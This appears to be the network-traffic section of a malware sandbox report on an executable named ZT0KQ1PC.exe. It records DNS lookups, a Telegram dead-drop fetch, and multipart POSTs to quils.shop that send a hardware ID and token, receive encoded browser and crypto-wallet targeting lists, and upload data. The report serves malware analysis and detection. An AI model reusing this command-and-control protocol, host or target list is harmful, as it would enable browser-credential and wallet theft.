Jan 5, 2025 20:08:09.142623901 CET	443	49755	142.250.186.68	192.168.2.4
Jan 5, 2025 20:08:09.142648935 CET	443	49755	142.250.186.68	192.168.2.4
Jan 5, 2025 20:08:09.142668009 CET	49755	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:08:09.142673969 CET	443	49755	142.250.186.68	192.168.2.4
Jan 5, 2025 20:08:09.142709970 CET	49755	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:08:09.145001888 CET	443	49755	142.250.186.68	192.168.2.4
Jan 5, 2025 20:08:09.147325993 CET	443	49755	142.250.186.68	192.168.2.4
Jan 5, 2025 20:08:09.147367954 CET	49755	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:08:09.147373915 CET	443	49755	142.250.186.68	192.168.2.4
Jan 5, 2025 20:08:09.149646997 CET	443	49755	142.250.186.68	192.168.2.4
Jan 5, 2025 20:08:09.149677992 CET	443	49755	142.250.186.68	192.168.2.4
Jan 5, 2025 20:08:09.149698973 CET	49755	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:08:09.149703979 CET	443	49755	142.250.186.68	192.168.2.4
Jan 5, 2025 20:08:09.149738073 CET	49755	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:08:09.149743080 CET	443	49755	142.250.186.68	192.168.2.4
Jan 5, 2025 20:08:09.152010918 CET	443	49755	142.250.186.68	192.168.2.4
Jan 5, 2025 20:08:09.152056932 CET	49755	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:08:09.152062893 CET	443	49755	142.250.186.68	192.168.2.4
Jan 5, 2025 20:08:09.152210951 CET	443	49755	142.250.186.68	192.168.2.4
Jan 5, 2025 20:08:09.152235031 CET	49755	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:08:09.152241945 CET	443	49755	142.250.186.68	192.168.2.4
Jan 5, 2025 20:08:09.152262926 CET	49755	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:08:18.658050060 CET	443	49757	142.250.186.68	192.168.2.4
Jan 5, 2025 20:08:18.658118010 CET	443	49757	142.250.186.68	192.168.2.4
Jan 5, 2025 20:08:18.658169985 CET	49757	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:08:20.585665941 CET	49757	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:08:20.585675955 CET	443	49757	142.250.186.68	192.168.2.4
Jan 5, 2025 20:09:00.600810051 CET	49723	80	192.168.2.4	88.221.110.91
Jan 5, 2025 20:09:00.600869894 CET	49724	80	192.168.2.4	199.232.210.172
Jan 5, 2025 20:09:00.606441975 CET	80	49723	88.221.110.91	192.168.2.4
Jan 5, 2025 20:09:00.606455088 CET	80	49724	199.232.210.172	192.168.2.4
Jan 5, 2025 20:09:00.606494904 CET	49723	80	192.168.2.4	88.221.110.91
Jan 5, 2025 20:09:00.606511116 CET	49724	80	192.168.2.4	199.232.210.172
Jan 5, 2025 20:09:11.758491039 CET	49881	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:09:11.758533955 CET	443	49881	142.250.186.68	192.168.2.4
Jan 5, 2025 20:09:11.758605957 CET	49881	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:09:11.758805037 CET	49881	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:09:11.758816957 CET	443	49881	142.250.186.68	192.168.2.4
Jan 5, 2025 20:09:12.391107082 CET	443	49881	142.250.186.68	192.168.2.4
Jan 5, 2025 20:09:12.391387939 CET	49881	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:09:12.391398907 CET	443	49881	142.250.186.68	192.168.2.4
Jan 5, 2025 20:09:12.391711950 CET	443	49881	142.250.186.68	192.168.2.4
Jan 5, 2025 20:09:12.392023087 CET	49881	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:09:12.392081022 CET	443	49881	142.250.186.68	192.168.2.4
Jan 5, 2025 20:09:12.443391085 CET	49881	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:09:22.306689978 CET	443	49881	142.250.186.68	192.168.2.4
Jan 5, 2025 20:09:22.306740999 CET	443	49881	142.250.186.68	192.168.2.4
Jan 5, 2025 20:09:22.306884050 CET	49881	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:09:36.417460918 CET	49881	443	192.168.2.4	142.250.186.68
Jan 5, 2025 20:09:36.417488098 CET	443	49881	142.250.186.68	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 20:07:55.285640955 CET	52856	53	192.168.2.4	1.1.1.1
Jan 5, 2025 20:07:55.292480946 CET	53	52856	1.1.1.1	192.168.2.4
Jan 5, 2025 20:07:56.235896111 CET	61135	53	192.168.2.4	1.1.1.1
Jan 5, 2025 20:07:56.248126030 CET	53	61135	1.1.1.1	192.168.2.4
Jan 5, 2025 20:08:07.478159904 CET	53	57559	1.1.1.1	192.168.2.4
Jan 5, 2025 20:08:07.482520103 CET	53	62302	1.1.1.1	192.168.2.4
Jan 5, 2025 20:08:07.627877951 CET	50823	53	192.168.2.4	1.1.1.1
Jan 5, 2025 20:08:07.628021955 CET	51860	53	192.168.2.4	1.1.1.1
Jan 5, 2025 20:08:07.635505915 CET	53	50823	1.1.1.1	192.168.2.4
Jan 5, 2025 20:08:07.635657072 CET	53	51860	1.1.1.1	192.168.2.4
Jan 5, 2025 20:08:08.463556051 CET	53	58821	1.1.1.1	192.168.2.4
Jan 5, 2025 20:08:09.333959103 CET	53	52329	1.1.1.1	192.168.2.4
Jan 5, 2025 20:08:11.076515913 CET	51285	53	192.168.2.4	1.1.1.1
Jan 5, 2025 20:08:11.076711893 CET	58294	53	192.168.2.4	1.1.1.1
Jan 5, 2025 20:08:11.081799984 CET	53	57516	1.1.1.1	192.168.2.4
Jan 5, 2025 20:08:11.083674908 CET	53	51285	1.1.1.1	192.168.2.4
Jan 5, 2025 20:08:11.084736109 CET	53	58294	1.1.1.1	192.168.2.4
Jan 5, 2025 20:08:12.077276945 CET	58940	53	192.168.2.4	1.1.1.1
Jan 5, 2025 20:08:12.077553034 CET	65272	53	192.168.2.4	1.1.1.1
Jan 5, 2025 20:08:12.084423065 CET	53	58940	1.1.1.1	192.168.2.4
Jan 5, 2025 20:08:12.084732056 CET	53	65272	1.1.1.1	192.168.2.4
Jan 5, 2025 20:08:16.546997070 CET	138	138	192.168.2.4	192.168.2.255
Jan 5, 2025 20:08:20.592804909 CET	53	53953	1.1.1.1	192.168.2.4
Jan 5, 2025 20:08:25.492831945 CET	53	58152	1.1.1.1	192.168.2.4
Jan 5, 2025 20:08:44.234118938 CET	53	51724	1.1.1.1	192.168.2.4
Jan 5, 2025 20:09:06.749327898 CET	53	53850	1.1.1.1	192.168.2.4
Jan 5, 2025 20:09:07.457139969 CET	53	54158	1.1.1.1	192.168.2.4
Jan 5, 2025 20:09:36.424921989 CET	53	56354	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 5, 2025 20:07:55.285640955 CET	192.168.2.4	1.1.1.1	0x2726	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Jan 5, 2025 20:07:56.235896111 CET	192.168.2.4	1.1.1.1	0x60a1	Standard query (0)	quils.shop	A (IP address)	IN (0x0001)	false
Jan 5, 2025 20:08:07.627877951 CET	192.168.2.4	1.1.1.1	0x6b98	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 5, 2025 20:08:07.628021955 CET	192.168.2.4	1.1.1.1	0x250f	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 5, 2025 20:08:11.076515913 CET	192.168.2.4	1.1.1.1	0x7170	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Jan 5, 2025 20:08:11.076711893 CET	192.168.2.4	1.1.1.1	0x6bbb	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Jan 5, 2025 20:08:12.077276945 CET	192.168.2.4	1.1.1.1	0x6ea1	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Jan 5, 2025 20:08:12.077553034 CET	192.168.2.4	1.1.1.1	0xb146	Standard query (0)	play.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 5, 2025 20:07:55.292480946 CET	1.1.1.1	192.168.2.4	0x2726	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Jan 5, 2025 20:07:56.248126030 CET	1.1.1.1	192.168.2.4	0x60a1	No error (0)	quils.shop		116.203.13.109	A (IP address)	IN (0x0001)	false
Jan 5, 2025 20:08:07.635505915 CET	1.1.1.1	192.168.2.4	0x6b98	No error (0)	www.google.com		142.250.186.68	A (IP address)	IN (0x0001)	false
Jan 5, 2025 20:08:07.635657072 CET	1.1.1.1	192.168.2.4	0x250f	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 5, 2025 20:08:11.083674908 CET	1.1.1.1	192.168.2.4	0x7170	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2025 20:08:11.083674908 CET	1.1.1.1	192.168.2.4	0x7170	No error (0)	plus.l.google.com		216.58.212.174	A (IP address)	IN (0x0001)	false
Jan 5, 2025 20:08:11.084736109 CET	1.1.1.1	192.168.2.4	0x6bbb	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2025 20:08:12.084423065 CET	1.1.1.1	192.168.2.4	0x6ea1	No error (0)	play.google.com		142.250.186.110	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

quils.shop

www.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	149.154.167.99	443	1188	C:\Users\user\Desktop\ZT0KQ1PC.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:07:56 UTC	85	OUT	GET /w211et HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2025-01-05 19:07:56 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 05 Jan 2025 19:07:56 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12299 Connection: close Set-Cookie: stel_ssid=4a0fb8093267adc1ed_9997635232316695765; expires=Mon, 06 Jan 2025 19:07:56 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2025-01-05 19:07:56 UTC	12299	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 77 32 31 31 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @w211et</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	116.203.13.109	443	1188	C:\Users\user\Desktop\ZT0KQ1PC.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:07:57 UTC	183	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: quils.shop Connection: Keep-Alive Cache-Control: no-cache
2025-01-05 19:07:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 05 Jan 2025 19:07:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-05 19:07:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	116.203.13.109	443	1188	C:\Users\user\Desktop\ZT0KQ1PC.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:07:58 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----WT2DT2NGVAAAIEUSR1N7 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: quils.shop Content-Length: 255 Connection: Keep-Alive Cache-Control: no-cache
2025-01-05 19:07:58 UTC	255	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 57 54 32 44 54 32 4e 47 56 41 41 41 49 45 55 53 52 31 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 45 42 32 33 46 42 45 37 37 38 37 33 37 34 37 32 34 34 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 57 54 32 44 54 32 4e 47 56 41 41 41 49 45 55 53 52 31 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 32 62 34 30 39 37 38 64 31 33 38 65 30 38 31 61 62 38 36 36 32 61 39 64 31 65 37 37 30 66 34 0d 0a 2d 2d 2d 2d 2d 2d 57 54 32 44 54 32 4e 47 56 41 41 41 49 45 55 53 52 31 4e 37 2d 2d 0d 0a Data Ascii: ------WT2DT2NGVAAAIEUSR1N7Content-Disposition: form-data; name="hwid"CDEB23FBE778737472448-a33c7340-61ca------WT2DT2NGVAAAIEUSR1N7Content-Disposition: form-data; name="build_id"52b40978d138e081ab8662a9d1e770f4------WT2DT2NGVAAAIEUSR1N7--
2025-01-05 19:07:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 05 Jan 2025 19:07:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-05 19:07:59 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 30 36 39 38 38 33 37 62 61 34 62 37 62 39 30 34 65 64 31 34 31 37 35 64 64 30 32 35 65 32 64 31 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|0698837ba4b7b904ed14175dd025e2d1\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49738	116.203.13.109	443	1188	C:\Users\user\Desktop\ZT0KQ1PC.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:07:59 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----1VKX4WLNYCBAIMGLF37G User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: quils.shop Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-01-05 19:07:59 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 56 4b 58 34 57 4c 4e 59 43 42 41 49 4d 47 4c 46 33 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 39 38 38 33 37 62 61 34 62 37 62 39 30 34 65 64 31 34 31 37 35 64 64 30 32 35 65 32 64 31 0d 0a 2d 2d 2d 2d 2d 2d 31 56 4b 58 34 57 4c 4e 59 43 42 41 49 4d 47 4c 46 33 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 32 62 34 30 39 37 38 64 31 33 38 65 30 38 31 61 62 38 36 36 32 61 39 64 31 65 37 37 30 66 34 0d 0a 2d 2d 2d 2d 2d 2d 31 56 4b 58 34 57 4c 4e 59 43 42 41 49 4d 47 4c 46 33 37 47 0d 0a 43 6f 6e 74 Data Ascii: ------1VKX4WLNYCBAIMGLF37GContent-Disposition: form-data; name="token"0698837ba4b7b904ed14175dd025e2d1------1VKX4WLNYCBAIMGLF37GContent-Disposition: form-data; name="build_id"52b40978d138e081ab8662a9d1e770f4------1VKX4WLNYCBAIMGLF37GCont
2025-01-05 19:08:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 05 Jan 2025 19:08:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-05 19:08:00 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	116.203.13.109	443	1188	C:\Users\user\Desktop\ZT0KQ1PC.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:08:01 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----OHVA1DT0HDJEUASRQ1D2 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: quils.shop Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-01-05 19:08:01 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 48 56 41 31 44 54 30 48 44 4a 45 55 41 53 52 51 31 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 39 38 38 33 37 62 61 34 62 37 62 39 30 34 65 64 31 34 31 37 35 64 64 30 32 35 65 32 64 31 0d 0a 2d 2d 2d 2d 2d 2d 4f 48 56 41 31 44 54 30 48 44 4a 45 55 41 53 52 51 31 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 32 62 34 30 39 37 38 64 31 33 38 65 30 38 31 61 62 38 36 36 32 61 39 64 31 65 37 37 30 66 34 0d 0a 2d 2d 2d 2d 2d 2d 4f 48 56 41 31 44 54 30 48 44 4a 45 55 41 53 52 51 31 44 32 0d 0a 43 6f 6e 74 Data Ascii: ------OHVA1DT0HDJEUASRQ1D2Content-Disposition: form-data; name="token"0698837ba4b7b904ed14175dd025e2d1------OHVA1DT0HDJEUASRQ1D2Content-Disposition: form-data; name="build_id"52b40978d138e081ab8662a9d1e770f4------OHVA1DT0HDJEUASRQ1D2Cont
2025-01-05 19:08:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 05 Jan 2025 19:08:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-05 19:08:02 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	116.203.13.109	443	1188	C:\Users\user\Desktop\ZT0KQ1PC.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:08:03 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----S00Z58G4WTRQQIEKNO8Y User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: quils.shop Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2025-01-05 19:08:03 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 53 30 30 5a 35 38 47 34 57 54 52 51 51 49 45 4b 4e 4f 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 39 38 38 33 37 62 61 34 62 37 62 39 30 34 65 64 31 34 31 37 35 64 64 30 32 35 65 32 64 31 0d 0a 2d 2d 2d 2d 2d 2d 53 30 30 5a 35 38 47 34 57 54 52 51 51 49 45 4b 4e 4f 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 32 62 34 30 39 37 38 64 31 33 38 65 30 38 31 61 62 38 36 36 32 61 39 64 31 65 37 37 30 66 34 0d 0a 2d 2d 2d 2d 2d 2d 53 30 30 5a 35 38 47 34 57 54 52 51 51 49 45 4b 4e 4f 38 59 0d 0a 43 6f 6e 74 Data Ascii: ------S00Z58G4WTRQQIEKNO8YContent-Disposition: form-data; name="token"0698837ba4b7b904ed14175dd025e2d1------S00Z58G4WTRQQIEKNO8YContent-Disposition: form-data; name="build_id"52b40978d138e081ab8662a9d1e770f4------S00Z58G4WTRQQIEKNO8YCont
2025-01-05 19:08:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 05 Jan 2025 19:08:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-05 19:08:03 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	116.203.13.109	443	1188	C:\Users\user\Desktop\ZT0KQ1PC.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:08:04 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----XT2DBS0R1N7YUA1DB1NY User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: quils.shop Content-Length: 5725 Connection: Keep-Alive Cache-Control: no-cache
2025-01-05 19:08:04 UTC	5725	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 58 54 32 44 42 53 30 52 31 4e 37 59 55 41 31 44 42 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 39 38 38 33 37 62 61 34 62 37 62 39 30 34 65 64 31 34 31 37 35 64 64 30 32 35 65 32 64 31 0d 0a 2d 2d 2d 2d 2d 2d 58 54 32 44 42 53 30 52 31 4e 37 59 55 41 31 44 42 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 32 62 34 30 39 37 38 64 31 33 38 65 30 38 31 61 62 38 36 36 32 61 39 64 31 65 37 37 30 66 34 0d 0a 2d 2d 2d 2d 2d 2d 58 54 32 44 42 53 30 52 31 4e 37 59 55 41 31 44 42 31 4e 59 0d 0a 43 6f 6e 74 Data Ascii: ------XT2DBS0R1N7YUA1DB1NYContent-Disposition: form-data; name="token"0698837ba4b7b904ed14175dd025e2d1------XT2DBS0R1N7YUA1DB1NYContent-Disposition: form-data; name="build_id"52b40978d138e081ab8662a9d1e770f4------XT2DBS0R1N7YUA1DB1NYCont
2025-01-05 19:08:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 05 Jan 2025 19:08:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-05 19:08:05 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	116.203.13.109	443	1188	C:\Users\user\Desktop\ZT0KQ1PC.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:08:05 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----XT2DBS0R1N7YUA1DB1NY User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: quils.shop Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
